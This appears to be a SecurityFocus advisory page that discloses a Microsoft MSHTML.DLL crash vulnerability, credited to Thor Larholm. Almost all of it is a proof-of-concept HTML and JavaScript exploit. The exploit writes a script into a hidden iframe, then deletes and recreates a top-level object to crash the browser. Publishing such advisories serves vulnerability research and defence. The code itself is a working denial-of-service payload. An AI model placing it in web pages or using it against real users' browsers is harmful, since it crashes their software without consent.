Microsoft MSHTML.DLL Crash Vulnerability

The following exploit has been provided by Thor Larholm <thor@jubii.dk>:

<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>


 

Privacy Statement
Copyright 2010, SecurityFocus